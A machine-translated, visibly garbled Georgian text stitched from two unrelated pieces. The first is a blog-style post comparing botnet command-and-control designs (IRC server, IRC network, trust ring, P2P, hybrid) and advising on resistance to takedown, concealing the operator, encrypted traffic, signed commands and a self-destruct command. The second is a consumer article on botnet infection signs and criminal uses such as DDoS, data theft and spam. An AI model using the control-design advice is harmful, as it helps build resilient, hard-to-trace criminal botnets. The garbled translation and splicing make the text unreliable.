შექმნა botnet. ბოტეტი

გასაკვირი არ არის, რომ მე გამოვაქვეყნეთ ჩემი შენიშვნა თანატოლების ქსელების შესახებ. კომენტარები მკითხველს ძალიან სასარგებლო აღმოჩნდა. ამ მიმართულებით შემდგომი მუშაობა მომეწონა. რა მოხდა ამ - გამოიყურება ქვეშ cut.

როგორც ჩანს, პოსტის სახელიდან ჩანს, დღეს ეს იქნება მხოლოდ ბოტნეტების შესახებ. ფაილების გაზიარების, პროქსი ქსელების, Peerbogs და P2P ვალუტის გაზიარების შესახებ.

სიტყვა "ბოტნეტს" არ უნდა გაიგოს რაღაც უკანონო. როდესაც მომხმარებელი ნებაყოფლობით ჩამოტვირთვებს და აყენებს "ბოტს", რათა სამეცნიერო პროექტის საჭიროებებზე მისი საგზაო და კომპიუტერული რესურსების შესწორება, ასევე ბოტნეტი. შესაბამისად, Botmaster არ არის აუცილებელი კრიმინალური. სამეცნიერო პროექტში ჩართული 30 მეცნიერთა ჯგუფი ასევე "Botmaster".

1. BottNet კონტროლი სერვერზე

მარტივი გზა კონტროლის ბოტები არის დაიწყოს IRC / HTTP სერვერი. მეშვეობით, ბოტები მიიღებს ბრძანებებს და მისი დახმარებით გაგზავნის შედეგს მათი აღსრულების შედეგი.

მე დავხატო, როგორც მე შემიძლია :) ამ შემთხვევაში, ილუსტრაცია არ შეიძლება საჭირო, მაგრამ მე გადავწყვიტე, რომ მოვემზადოთ შოკი, რომელიც სხვა სურათებს აწარმოებს.

  • ძალიან მარტივი განხორციელება, განსაკუთრებით IRC- ის შემთხვევაში.
  • სწრაფი რეაგირების ბოტები.
  • თქვენ შეგიძლიათ მისცეს ბრძანებები როგორც მთელ ქსელს და კონკრეტულ ბოტს.
  • თუ ქსელი შედგება ასობით კვანძებისგან, ერთი არხი Dalnet არის საკმარისი იმისათვის, რომ მართოს იგი. ქსელებისათვის, ეს შეიძლება იყოს უფრო დაბალი ღირებულება (დაახლოებით 300 რუბლი / თვე) ვებ ჰოსტინგი.
  • HTTP შემთხვევაშიTheserver ძალიან გამარტივებულია ლამაზი UI- ის განვითარებით. ეს მნიშვნელოვანია, თუ ჩვენ ვიყენებთ ბოტნეტებს ზოგიერთ ვებ-სერვისში.
  • დატვირთვა სერვერზე. უმსხვილესი ბოტნეტების კვანძების რაოდენობა მილიონობით იზომება. ასეთი გულშემატკივართა კონტროლი, ერთი სერვერი პატარაა.
  • თუ რამე ხდება სერვერზე (ავარიის ქსელში, DDOs, ცეცხლი მონაცემთა ცენტრში), ქსელი დასრულდება.
  • ერთი სერვერი ადვილად ჩატვირთვა. ეს შეიძლება გაკეთდეს როგორც პროვაიდერი და Kaspersky ლაბორატორიის პროდუქცია მომხმარებლის კომპიუტერზე.
  • Botmaster შედარებით ადვილია. ერთხელ დაავიწყდა VPN - დაველოდოთ სტუმრებს ჯაჭვებში.
  • IRC- ის შემთხვევაშიგუნდები მხოლოდ ბოტს იღებენ. თუ ბოტი არხისკენ მიდის გუნდის გაგზავნის შემდეგ, ეს იქნება "არა საგანი".
  • ბოტების რაოდენობა და მათი IP შეიძლება განისაზღვროს IRC არხზე. არხის დაცვის პაროლი არ დაეხმარება, რადგან ეს უკანასკნელი ადვილია ბოტ კოდის გარეთ.

2. IRC ქსელის მეშვეობით მართვა

წინა მეთოდის მუშების ლოგიკური ნაბიჯი არ არის ერთი სერვერი, მაგრამ რამდენიმე. ჩემი აზრით, უმარტივესი გზაა, თქვენი IRC ქსელის მოხსნას. ამ შემთხვევაში, IRC პროტოკოლის სერვერებს შორის მონაცემთა გადაცემის ყველა პასუხისმგებლობაა. ბოტების მხრიდან არ იქნება განსხვავება წინა გადაწყვეტილების შედარებით.

  • მარტივი განხორციელება, მიუხედავად იმისა, რომ თქვენ უნდა შეექმნათ სერვერების კონფიგურაცია.
  • ბოტები კვლავ პასუხობენ გუნდებს.
  • თქვენ კვლავ შეგიძლიათ გააკეთოთ ბრძანებები კონკრეტულ ბოტს.
  • ჩატვირთვა განაწილება სერვერებს შორის, დაცვის წინააღმდეგ DDOs და Force Majeure. ათობით კარგი სერვერი შეიძლება იყოს საკმარისი ქსელის მილიონი ბოტებიდან.
  • თუ სერვერების ნაწილს უარს იტყვით, მათ შეუძლიათ შეცვალონ ისინი მათთან.
  • თუ IRC გამოიყენება და იმავე არხზე იჯდეს ათასი ბოტები, გამოიყენეთ რამდენიმე არხი. შესაბამისად, თქვენ შეგიძლიათ სხვადასხვა ამოცანები ქსელის სხვადასხვა კუთხეში.
  • ჩვენ უნდა გავიდნენ სერვერზე / VDS- ზე.
  • თქვენ შეგიძლიათ შეიძინოთ ყველა სერვერზე ამავე დროს და Botmaster არ ექნება დრო, რომ შეცვალოს ისინი.
  • Botmaster კვლავ ადვილია საკმარისი იმისათვის, რომ თვალყური.
  • IRC- ის შემთხვევაში, რაოდენობის ბოტები და მათი IP კვლავ თვალწინ.
  • ბოტები, რომლებიც უბრალოდ შევიდნენ არხზე, არა საგანი.

ტერმინი tresting (ნდობის ბეჭედი, წრე / ბეჭედი ნდობა) მე პირველად მოვისმინე თანამემამულე Nickolas კომენტარები წინა შენიშვნა. ბოტნეტის ნაწილის "სერვერების" ფუნქციის მინიჭებაა.

  • სერვერები არ სჭირდებათ.
  • Tresting შეიძლება შედგებოდეს ასობით კვანძებისგან. ამაღლებისა და კონტროლის ასეთი რიცხვი IRC / HTTP სერვერები არ არის ადვილი.
  • ბოტები არ უნდა მუდმივად გააგრძელოს კავშირი ტურნესთან. საკმარისია ყოველ 5-10 წუთის შესამოწმებლად, თუ ახალი ბრძანებები არ გამოჩნდება. თითოეულ გუნდს უნდა ჰქონდეს TTL, რომლის დროსაც იგი ინახება ტურში.
  • "სერვერების" დიდი რაოდენობა უზრუნველყოფს ქსელის სტაბილურობას ყველა სახის კატასტროფებზე. როდესაც ბეჭდის ნაწილი არის გამოჩენილი, Botmaster შეუძლია გუნდის შექმნის შესახებ ახალი tart. ან მას შეუძლია გააკეთოს რგოლები კვანძების თავად (თქვენ გჭირდებათ ციფრული ხელმოწერები და თანხმობა გარკვეული პროცენტული truds).
  • მოდით დაგემოვნება შედგება 512 knots, მინიმუმ 50% მუდმივად ონლაინ. თუ ქსელში 1,000,000 ბოტები არსებობს და თითოეული მათგანი მუდმივად თამაშობს, 4000-ზე ნაკლები ბოტზე ნაკლებია 4,000 ბოტზე ნაკლები. ყოველი 10 წუთის განმავლობაში ბოტს ბრძანების (ან შედეგების გაგზავნისას) მოთხოვნის შემთხვევაში, თითოეული ბეჭედი კვანძის ერთდროულად 7-ზე მეტი ნაერთების დამუშავება იქნება. საკმაოდ ცოტა ამ ზომის ქსელისთვის, არა?
  • მხოლოდ Botmaster შეუძლია მიიღოს ზუსტი სია ყველა Botmaster.
  • თქვენ შეგიძლიათ თქვათ ბრძანებები კონკრეტული ბოტი ან ბოტების ჯგუფი.
  • სწრაფი ბოთლი რეაქცია გუნდებს.
  • Botmaster ძნელია იპოვოთ.

ერთადერთი მინუსი, რომელიც მე ვხედავ არის სირთულე განხორციელების.

4. პიროგრაფიული ქსელები

თუ თქვენ ფიქრობთ ინტერნეტ წყაროები, P2P Botnets ამჟამად ძალიან პოპულარულია. ამ წყაროებს შორის არის ყველაზე დიდი ყურადღება. ასეთი ქსელის თითოეული კვანძი იცის მხოლოდ რამდენიმე "მეზობელი" კვანძები. Botmaster აგზავნის ბრძანებებს რამდენიმე ქსელური კვანძების, რის შემდეგაც იგი გადაცემულია მეზობელი მეზობელი.

მეზობლების სია სპეციალურ სერვერზე ერთხელ გაცემულია. ეს შეიძლება იყოს, მაგალითად, გატეხილი საიტი. მეტი სერვერი არაფერს აკეთებს, საჭიროა მხოლოდ ბოტნეტში კვანძების დამატებით.

  • განხორციელება გარკვეულწილად უფრო ადვილია, ვიდრე წინა პუნქტში.
  • მინიმალური დატვირთვა ყველა ქსელის კვანძებზე. ბოტნეტის ზომა თითქმის შეუზღუდავია.
  • წინააღმდეგობის გაწევა DDOs, კვანძების გათიშვა და ასე შემდეგ. P2P-Botnet თითქმის შეუძლებელია ჩატვირთვისას.
  • არ არის მუდმივი კავშირები, როგორც IRC- ის შემთხვევაში.
  • გვჭირდება სერვერი, თუმცა დიდხანს არ არის.
  • კვანძების დროდადრო იღუპება, რაც გავლენას ახდენს ქსელის კავშირით.
  • ყველა ბოტების ჩამონათვალის მისაღებად, საჭიროა, მაგალითად, მათთვის ბრძანება მიუთითოთ კონკრეტული საიტი. ამ შემთხვევაში, არ არსებობს გარანტია, რომ სია მიიღებს მხოლოდ botmaster.
  • მისცეს ბრძანება კონკრეტული კვანძის, თქვენ უნდა ან გააგზავნოთ ეს მთელი ქსელი, ან დაკავშირება კვანძის პირდაპირ.
  • ნელი რეაგირება ბოტები გუნდებისთვის.
  • მაგალითად, "ხანგრძლივი" ბრძანების გაგზავნა, მაგალითად, URL- ის სიის გაგზავნა, თქვენ უნდა გამოიყენოთ მესამე მხარის სერვერი, წინააღმდეგ შემთხვევაში, ბოტები კიდევ უფრო მეტს შეანელებს.
  • Botmaster უფრო ადვილია, ვიდრე წინა მაგალითს, ნებისმიერი სერვერის გამოყენების გამო.

რა თქმა უნდა, მე შეიძლება არასწორი, მაგრამ ჩემი აზრით P2P-Botnets ბევრად უარესია, ვიდრე tart. შესაძლოა, ანტივირუსების მწარმოებლები რაღაც მდუმარეზე?

5. ყოვლისმომცველი გადაწყვეტა

ერთი გზა გამოგონება რაღაც ახალი და კარგი - გადაკვეთა რაღაც ძველი. კომბინირებული ტელეფონი, კომპიუტერი, ფირზე ჩამწერი, კამერა და ვიდეოკამერა - სმარტფონი მიიღო. არავინ არ გაგიკვირდებათ კომპიუტერის და კლიმატის კონტროლის მანქანაში. ჩვენ გლუვი თითოეული იოგურტი მაგნიტი მაცივარში, და გაყიდვა მიიღოს off.

მნიშვნელოვანია გვახსოვდეს, რომ წარუმატებელი გადაკვეთით ჩვენ შეგვიძლია არაფერი არაფერი. შეგახსენებთ გენეტიკურ ალგორითმს, არა? მიიღეთ, როგორც ჩანს, კარგი იდეა - P2P-Botnet, სადაც მოზიდვა პასუხისმგებელია მეზობლების დანიშვნაზე. მაშინ ჩვენ არ გვჭირდება სერვერი!

მაგრამ ამ შემთხვევაში, განხორციელების სირთულე გაიზრდება, თუმცა ოდნავ ოდნავ. დანარჩენი P2P Botnet პრობლემები დარჩება გადაუჭრელი. გამარჯვება უმნიშვნელოა, ანგარიშზე 1: 1.

ზოგიერთი იჯდა ნაჭერი ქაღალდი და ფანქარი, მე დაბადების შემდეგ იდეა. რამდენადაც ვიცი, მან არასდროს გაახმაურა ადრე, და მე ვარ პირველი, ვინც გამოვიდა. CHSV Plus 100.

რომ თუ ქსელს აქვს ორი სახელმწიფო - "აქტიური" და "პასიური". პასიურ მდგომარეობაში, Botnet მუშაობს P2P სქემის მიხედვით. Botmaster აგზავნის ბრძანება "მობილიზება ჯარები" და ქსელი იქცევა ათასზე. თავის გუნდში ბოტმასტერმა უნდა მიუთითოს ტურის კვანძები და დრო, რომელსაც ქსელი შეცვლის მის მდგომარეობას. ასე რომ, ბეჭედი უფრო მეტი იყო, თქვენ შეგიძლიათ გააკეთოთ გუნდი რამდენიმე ბოტს, რომ მოვუწოდებთ თქვენს მეზობლებს. გარდა ამისა, ყველა ბრძანებები გადაცემულია ტურის მეშვეობით. ის პასუხისმგებელია "მეზობლების" ახალი კვანძების დანიშვნაზე. თუ TTL რგოლები მოგვიანებით აღმოჩნდება საკმარისი, შეგიძლიათ "აქტიური სახელმწიფო" ბრძანების გაცემა.

ასეთი botnet არ დაიმკვიდრებს ერთი მინუს P2P ქსელი და ექნება ყველა უპირატესობა tart, ისევე როგორც:

  • გაზრდილი სტაბილურობა DDOS თავდასხმების და ქსელის ფილტრები, როგორიცაა P2P ქსელი.
  • მინიმალური რესურსების მოხმარება ბოტების მიერ ქსელის დროს. Botmaster არ უნდა აკონტროლოთ სტატუსის tart და აირჩიოს ახალი კვანძების მისთვის.
  • ავტომატური შექმნისას, მხოლოდ იმ კვანძების შერჩევა ხდება ამჟამად ონლაინ რეჟიმში. ბოტები უკავშირდება ბეჭედს პირველი მცდელობით (ხნით).
  • "მეზობლების" ჩამონათვალი პერიოდულად განახლდება. ყველა იმავე IP კვანძში შედის დროებითი ბეჭედი იცის მთელი ბოტნეტის. ასე რომ, ეს კვანძები განიხილავს ამ კვანძებს, თუ რეალური მეზობლების ნაწილი დიდხანს არ გამოჩნდა.

და ერთადერთი ნაკლი მე ვხედავ აქ არის სირთულე განხორციელების. მაგრამ ეს ნამდვილად არ არის პრობლემა.

6. რა არის მნიშვნელოვანი გახსოვდეთ

აქამდე, მე დუმილი ზოგიერთი ქულა, რადგან ისინი თანდაყოლილი ნებისმიერი სახელები Botnet კონტროლის მეთოდები. ყურადღება უნდა მიექცეს მათზე.

  • კვანძების ნაწილი ვერ მიიღებს შემომავალი კავშირების გამო firewall ან NAT. მინიმუმამდე, აუცილებელია ბოტს წერა. მაგალითად, P2P ქსელში ბრძანებების გავრცელებისას, ბოტს უნდა შეეძლოს მეზობლების პერიოდულად წვდომა და არ დაველოდოთ მათ გუნდს.
  • უნდა გაიზარდოს ის ფაქტი, რომ ქსელების მიერ გაგზავნილი ყველა ბრძანება მოისმინა. მინიმუმ, დაინტერესებულ პირს შეუძლია შეცვალოს ბოტ კოდის ამ მიზნით. მიუხედავად ამისა, ეს აზრი აქვს ქსელში გადაცემული ყველა სატრანსპორტო საშუალების encrypt. მინიმუმ, ეს გაართულებს ბოტნეტის ანალიზს.
  • ყველა Botmaster ბრძანებები უნდა იყოს ხელმოწერილი ციფრული ხელმოწერა. პაროლები არ არის შესაფერისი, რადგან ისინი შეიძლება დაიბლოკოს.
  • მას შემდეგ, რაც მოვიდა განხორციელების შესახებ, მე აღვნიშნავ, რომ მინიმუმ სამი გუნდი უნდა იყოს გათვალისწინებული ნებისმიერ ბოტნეტში - Botmaster- ის განახლება, Botmaster- ის ძირითადი განახლება და მთელი ქსელის თვითგამორკვევა.
  • ქსელს აქვს "Spyware" კვანძები. ზოგი მათგანი ტურნეში შედის. ამავდროულად, ჩვენ არ ვიცით, რომ ეს "ჯაშუშები" ატარებს - ეს შეიძლება იყოს Botmaster IP- ის განმარტება, გუნდების აღსრულების დარღვევა, ქსელის კონტროლს, ბოტნეტზე კონტროლის მოპოვება და ასე შემდეგ. კერძოდ, ეს იმას ნიშნავს, რომ ბოტები უნდა აირჩიოს შემთხვევითი კვანძის როდესაც დამაკავშირებელი ბეჭედი, და არ გამოიყენოს ყველა დროის იგივე.
  • ფიგურაში, დანამატი კვანძები ერთმანეთს უკავშირდება, მაგრამ ბევრად უფრო პრაქტიკულია ბეჭედი მცირე P2P ქსელის სახით, ანუ "მეზობლების" პრინციპის მიხედვით.

მე ასევე აღვნიშნო, რომ გადაწყვეტილებები 1 და 2 (სერვერი, ბევრი სერვერები) ჩამორთმეული მრავალი Minuses და იღებს რამდენიმე უპირატესობა გადაჭრის 3 (ნდობა) გამოყენებით HTTP პროტოკოლი. გადაახვიეთ ეს ნივთები კვლავ გავიგოთ, რა ვარ.

7. დასკვნები

მცირე ქსელებისთვის, IRC- ის გამოყენება კარგი გამოსავალია. მაგალითად, თუ გსურთ შექმნათ თქვენი პატარა ქსელი განაწილებული გამოთვლითი, დააინსტალირეთ ბოტი თქვენს კომპიუტერში, ლეპტოპი, ნეთბუქზე, სამუშაო კომპიუტერი (თუ ეს საშუალებას აძლევს კომპანიის პოლიტიკას) და ქსელის მეშვეობით DALNET- ის მეშვეობით. თუ გჭირდებათ, მოგვიანებით ქსელი შეიძლება იყოს "სატუმბო" tart. თქვენ დაიცავით შესაბამისი ბრძანება, არა?

თუ ლამაზი ვებ ინტერფეისი საჭიროა ბოტნეტში, შეიძლება გაითვალისწინოს დამატებითი პროგრამა, რომელიც მიიღებს ბრძანებებს ვებ სერვერზე და გააგზავნეთ ისინი IRC- ზე. მინიმუმ განიხილოს ეს მიდგომა.

უნივერსალური გადაწყვეტილებები - ეს არის ტური და P2P + tresting. ასეთი ქსელები სრულყოფილად იმუშავებენ, თუ რამდენი კვანძია მათში, 1 ან 1,000,000, ყოველგვარი სერვერების გარეშე.

ბეჭდთან შედარებით "სუფთა P2P" აშკარა ხარვეზების არსებობის თვალსაზრისით, გაურკვეველი რჩება, რატომ არის კარგი გამოსავალი. რა თქმა უნდა, ბოტებიდან, საიდანაც ქსელი შედგება, არსებობს მრავალი სასარგებლო თვისება. რატომ არ დაამატოთ კიდევ ერთი პატარა payload - მობილიზება ქსელის ტურში?

აქ, ალბათ, ყველა. მოხარული ვარ, რომ თქვენი კომენტარი. განსაკუთრებით კრიტიკასთან, ტექსტში და თქვენი იდეების შესახებ უზუსტობების / წინააღმდეგობების შესახებ ინსტრუქციები.

დღეს, ბოტნეტები კიბერკრიმინალების ერთ-ერთი მთავარი იარაღია. Computerbild იქნება გითხრათ, რა ბოტნეტები არიან ისინი, თუ როგორ მუშაობს და როგორ შეინახოთ თქვენი კომპიუტერიდან zombie ქსელში.

Botnet, ან Zombie Network, არის ქსელი კომპიუტერების ინფიცირებული მუქარის პროგრამა, რომელიც საშუალებას აძლევს თავდამსხმელებს დისტანციურად მართოს სხვა ადამიანები მათი მფლობელების ცოდნის გარეშე. ბოლო წლებში, zombie ქსელი გახდა სტაბილური წყარო შემოსავლის Cybercriminals. არსებობს მუდმივად დაბალი ხარჯები და მინიმუმ ცოდნა, რომელიც აუცილებელია ბოტნეტების კონტროლისთვის, ხელს უწყობს პოპულარობის ზრდას და, შესაბამისად, ბოტნეტების რაოდენობა. DDOS Attacks ან SPAM საფოსტო, განხორციელებული zombie ქსელები, თავდამსხმელები და მათი მომხმარებლები მიიღონ ათასობით დოლარი.

ჩემი კომპიუტერი ინფიცირებულია ბოტთან?

ამ კითხვაზე პასუხი არ არის ადვილი. ფაქტია, რომ კომპიუტერის ყოველდღიური მუშაობის ბოტების ინტერვენციის ჩარევა თითქმის შეუძლებელია, რადგან ეს არ იმოქმედებს სისტემის სიჩქარით. მიუხედავად ამისა, არსებობს რამდენიმე ნიშანია, რისთვისაც შესაძლებელია, რომ ბოტი იმყოფება სისტემაში:

უცნობი პროგრამები ცდილობენ ინტერნეტთან დაკავშირებას, რომელიც პერიოდულად აღემატება firewall ან ანტივირუსით;

ინტერნეტ ტრაფიკი ძალიან დიდია, თუმცა ქსელის ძალიან ზომიერად იყენებთ;

გაშვებული სისტემის პროცესების სიაში, ახალი, masking for ჩვეულებრივი Windows პროცესები გამოჩნდება (მაგალითად, Bot შეგიძლიათ აცვიათ სახელი scvhost.exe - ეს სახელი ძალიან ჰგავს სახელით Windows Svchost.exe სისტემის პროცესი; ეს საკმაოდ რთული შენიშვნა განსხვავება, მაგრამ ეს შესაძლებელია).

რატომ არის ბოტნეტები

Batnets იქმნება, რათა ფული. თქვენ შეგიძლიათ აირჩიოთ კომერციულად ხელსაყრელი გამოყენების zombies: DDOS თავდასხმები, კონფიდენციალური ინფორმაციის შეგროვება, დაგზავნის სპამი, ფიშინგი, სპამი, მოტყუების დაჭერით მრიცხველები და ა.შ. უნდა აღინიშნოს, რომ ნებისმიერი მიმართულება იქნება მომგებიანი, ნებისმიერი სახის თავდამსხმელი არ არის არჩევა, და Botnet საშუალებას ყველა ჩამოთვლილი საქმიანობის ამავე დროს.

DDOS თავდასხმა (ინგლისურიდან. დისტრიბუციის გაუქმება) არის კომპიუტერული სისტემის თავდასხმა, მაგალითად, ვებ-გვერდზე, რომლის მიზანია "შემოდგომაზე", ეს არის ის, რომ ის, ვეღარ მიიღებს და პროცესი ითხოვს ლეგიტიმურ მომხმარებლებს. ერთ-ერთი ყველაზე გავრცელებული DDOS თავდასხმის მეთოდები არის მრავალრიცხოვანი მოთხოვნის გაგზავნა კომპიუტერზე ან მსხვერპლისთვის, რომელიც იწვევს შენარჩუნების უარის შემთხვევაში, თუ კომპიუტერის თავს დაესხნენ კომპიუტერის რესურსები არ არის საკმარისი იმისათვის, რომ გაუმკლავდეს ყველა შემომავალი მოთხოვნა. DDOS თავდასხმების შესანიშნავი ჰაკერული იარაღი, და Botnet არის იდეალური ინსტრუმენტი მათი ჩატარების.

DDOS თავდასხმები შეიძლება იყოს როგორც არაკეთილსინდისიერი კონკურენტუნარიანი ბრძოლისა და კრიორეზმის აქტების საშუალებით. Botnet- ის მასპინძელი შეიძლება ჰქონდეს სამსახურს არავისთვის არ არის ძალიან scrupulous მეწარმე - გამართავს DDOS თავდასხმის ადგილზე მისი კონკურენტი. თავდასხმის რესურსი ასეთი დატვირთვის შემდეგ "ნება", თავდასხმის მომხმარებელს მიიღებს დროებითი უპირატესობა და კიბერდანაშავა არის მოკრძალებული (ან არ არის ძალიან) ჯილდო.

ანალოგიურად, Botnet მფლობელები თავად შეგიძლიათ გამოიყენოთ DDOS თავდასხმების გამოძახება ფული დიდი კომპანიები. ამავდროულად, კომპანიები ურჩევნიათ კიბერკრიმინალის მოთხოვნების შესრულებას, რადგან წარმატებული DDOS- ის თავდასხმების შედეგების აღმოფხვრა ძალიან ძვირია. მაგალითად, 2009 წლის იანვარში Godaddy.com- ის ერთ-ერთი უმსხვილესი დამხმარე DDOS- ის თავდასხმას ექვემდებარება, რის შედეგადაც ათასობით სერვერზე გამოქვეყნდა ათასობით ადგილი, რომელიც თითქმის დღეში მიუწვდომელი აღმოჩნდა. Hoster ფინანსური დანაკარგები იყო უზარმაზარი.

2007 წლის თებერვალში ჩატარდა რიგი თავდასხმები Root DNS სერვერებზე, მთელი ინტერნეტის ნორმალური ფუნქციონირება პირდაპირ დამოკიდებულია ოპერაციაზე. ნაკლებად სავარაუდოა, რომ ამ თავდასხმების მიზანი იყო მსოფლიო ქსელის დაშლა, რადგან Zombie ქსელების არსებობა შესაძლებელია მხოლოდ იმ პირობით, რომ არსებობს და ჩვეულებრივ მუშაობს ინტერნეტში. ყველაზე მეტად ეს იყო zombie ქსელების ძალა და შესაძლებლობების დემონსტრირება.

DDOS თავდასხმების განხორციელების სარეკლამო მომსახურება ღიად გამოაქვეყნებს შესაბამის თემებს. თავდასხმის ფასები მერყეობს 50-დან რამდენიმე ათასი დოლარიდან უწყვეტი DDOS-Botnet ოპერაციის დღეში. საიტის მიხედვით www.shadowserver.org, 2008 წლისთვის, 190 ათასი DDO- ების თავდასხმები ჩატარდა, რომელზეც კიბერკრიმინალებს შეეძლოთ 20 მილიონი დოლარის მოსაპოვებლად. ბუნებრივია, ეს თანხა არ მოიცავს შანტაჟის შემოსავალს, რაც უბრალოდ შეუძლებელია გამოთვლა.

კონფიდენციალური ინფორმაციის შეგროვება

კონფიდენციალური ინფორმაცია, რომელიც ინახება მომხმარებელთა კომპიუტერებზე, ყოველთვის იზიდავს intruders. საკრედიტო ბარათის ნომრები, ფინანსური ინფორმაცია და პაროლები სხვადასხვა მომსახურებისათვის არის ყველაზე დიდი ინტერესი: საფოსტო ყუთები, FTP სერვერები, "მესინჯერები" და სხვები. ამავე დროს, თანამედროვე მუქარის პროგრამები საშუალებას მისცემს თავდამსხმელებს აირჩიონ ზუსტად მონაცემები, რომლებიც საინტერესოა - ამისათვის არის საკმარისი იმისათვის, რომ ჩამოტვირთოთ PC შესაბამისი მოდული.

Malefactors- ს შეუძლია გაყიდოს მოპარული ინფორმაცია ან გამოიყენოს იგი საკუთარ ინტერესებში. საბანკო ანგარიშების გაყიდვის ასობით რეკლამა გამოჩნდება მრავალრიცხოვან ფორუმზე. ანგარიშის ღირებულება დამოკიდებულია მომხმარებლის ანგარიშზე თანხის ოდენობაზე და 1-დან 1,500-მდე. ქვედა საზღვარი ვარაუდობს, რომ კონკურენტული ბრძოლის დროს, ამ ტიპის ბიზნესში ჩართული კიბერკრიმინალები იძულებულნი არიან შეამცირონ ფასები. მიიღოთ მეტი, ვიდრე ბევრი, მათ სჭირდებათ სტაბილური შემოდინება ახალი მონაცემები, და ამისათვის სტაბილური ზრდა zombie ქსელების საჭიროა. განსაკუთრებით საინტერესო ფინანსური ინფორმაცია Cardiers - თავდამსხმელები ჩართული ყალბი საბანკო ბარათები.

რამდენადაც ასეთი ოპერაციები, შესაძლებელია ცნობილი ისტორიის განსასჯელად ბრაზილიელი კიბერკრიმინალების ჯგუფთან, რომლებიც ორი წლის წინ დააპატიმრეს. მათ შეძლეს ჩვეულებრივი მომხმარებლების წაშლა საბანკო ანგარიშებიდან 4.74 მილიონი დოლარისგან კომპიუტერების მოპარული ინფორმაციის გამოყენებით. პერსონალური მონაცემების შეძენაში, რომლებსაც არ აქვთ პირდაპირი ურთიერთობა მომხმარებლის ფულს და კრიმინალებს, რომლებიც ყალბი დოკუმენტებით არიან დაკავებულნი, ყალბი საბანკო ანგარიშების გახსნაზე, უკანონო ოპერაციების ჩადენაში და ა.შ.

Battnets- ის მიერ შეგროვებული სხვა ტიპის ინფორმაცია არის ელექტრონული ფოსტის მისამართები და, საკრედიტო ბარათის ნომრებისა და ანგარიშებისგან განსხვავებით, მრავალფეროვანი ელექტრონული ფოსტის მისამართები შეიძლება შეიტყო ერთი ინფიცირებული კომპიუტერის მისამართიდან. შეგროვებული მისამართები გამოფენილია და ზოგჯერ "წონა" - ღარიბი. ასეთი "პროდუქტის" მთავარი მყიდველები სპამერები არიან. მილიონი ელ-ფოსტის სიაში 20-დან 100 დოლარამდე მიმართავს და იმავე მილიონზე მიმართავს საინფორმაციო ბიულეტენი 150-200 დოლარს შეადგენს. სარგებელი აშკარაა.

კრიმინალები ასევე დაინტერესებულნი არიან სხვადასხვა ფასიანი მომსახურებისა და ონლაინ მაღაზიებისთვის. რა თქმა უნდა, ისინი იაფია, ვიდრე საბანკო ანგარიშები, მაგრამ მათი განხორციელება უკავშირდება სამართალდამცავი ორგანოების მიერ დევნის მცირე რისკს.

მილიონობით სპამი შეტყობინებები ყოველდღიურად მთელს მსოფლიოში. გაუმართლებელი ფოსტის გაგზავნა თანამედროვე ბოტნეტების ერთ-ერთი მთავარი ფუნქციაა. Kaspersky ლაბორატორიის მიხედვით, დაახლოებით 80% მთელი სპამი იგზავნება მეშვეობით zombie ქსელი. მილიარდობით წერილები რეკლამის "Viagra", ძვირადღირებული საათების ასლები, ონლაინ კაზინოები და ა.შ., იგზავნება "Viagra", ძვირადღირებული საათების ასლები, ონლაინ კაზინოები და ა.შ. ამდენად, ჰაკერებმა კომპიუტერების Punch- ის მიერ სხვა მომხმარებლებზე: მისამართები, საიდანაც განაწილება ტარდება ანტივირუსული კომპანიების შავი სიით.

ბოლო წლებში, სფერო სფეროს სფერო გაფართოვდა: ICQ სპამი, სპამი სოციალური ქსელების, ფორუმების, ბლოგების გამოჩნდა. ეს არის ასევე Botnet მფლობელების "დამსახურება": ყოველივე ამის შემდეგ, სრულიად ადვილია დამატებითი მოდულის დამატება Bot კლიენტისთვის, გახსნის ჰორიზონტს ახალი ბიზნესისთვის ლოზუნგებით, როგორიცაა "სპამი Facebook- ზე. იაფია ". სპამის ფასები განსხვავდება სამიზნე აუდიტორიის მიხედვით და მისამართების რაოდენობაზე, რომელსაც განაწილება ტარდება. სამიზნეების ფასების მოგვარება - $ 70-დან ასობით ათასი დოლარიდან 1000 დოლარამდე რამდენიმე ათეული მილიონობით მისამართზე. გასულ წელს სპამერებმა წერილების გაგზავნით 780 მილიონი დოლარი მოიპოვეს.

ძიების სპამი შექმნა

კიდევ ერთი ვარიანტი გამოყენებით botnets არის გაზრდის პოპულარობის საიტების საძიებო სისტემებში. საძიებო ოპტიმიზაციის შესახებ მუშაობა, რესურსების ადმინისტრატორები ცდილობენ ძიების შედეგების ძიების ადგილის გაზრდას, რადგან უფრო მაღალი, უფრო მეტი სტუმრობენ საძიებო სისტემებში და, შესაბამისად, უფრო მეტი იქნება საიტის შემოსავალი მაგალითად, ვებ-გვერდებზე სარეკლამო სივრცის გაყიდვა. ბევრი კომპანია უამრავ ფულს უამრავ ფულს იხდის, რათა მათ "საძიებო სისტემებში" პირველი პოზიცია მოიტანონ. Botnet- ის მფლობელებმა თავიანთი ტექნიკა და ავტომატური საძიებო ოპტიმიზაციის პროცესი ავტომატიზირებულიყვნენ.

როდესაც თქვენ ხედავთ კომენტარებში თქვენს რეკორდში "Live Journal" ან წარმატებული ფოტო ასახული ფოტო ჰოსტინგი, ბევრი კავშირები მიერ შექმნილი პირის თქვენგანი, და ზოგჯერ თქვენი "მეგობარი" - არ გაგიკვირდებათ: მხოლოდ ვინმე უბრძანა თქვენი რესურსის ხელშეწყობა მფლობელებს ბოტნეტს. სპეციალურად შექმნილი პროგრამა დატვირთულია zombie კომპიუტერში და მისი მფლობელის სახელით პოპულარულ რესურსებზე კომენტარს აკეთებს დაწნული საიტის მითითებით. უკანონო ძიების სპამის მომსახურების საშუალო ფასი თვეში დაახლოებით 300 დოლარია.

რამდენი პერსონალური მონაცემები ღირს

მოპარული პირადი მონაცემების ღირებულება პირდაპირ დამოკიდებულია იმ ქვეყანაში, სადაც მათი კანონიერი მფლობელი ცხოვრობს. მაგალითად, აშშ-ს რეზიდენტის საერთო მონაცემები 5-8 დოლარია. შავი ბაზარზე, ევროკავშირის ეს მაცხოვრებლები განსაკუთრებით ფასდება - ისინი ორიდან სამჯერ უფრო ძვირია, ვიდრე აშშ-ს მოქალაქეებისა და კანადის მონაცემები. ეს შეიძლება აიხსნას ის ფაქტი, რომ ასეთი მონაცემების დამნაშავეებს შეუძლიათ ევროკავშირში შეტანილი ნებისმიერ ქვეყანაში. საშუალოდ, ერთი პირის სრული მონაცემთა პაკეტის ფასი დაახლოებით 7 დოლარია.

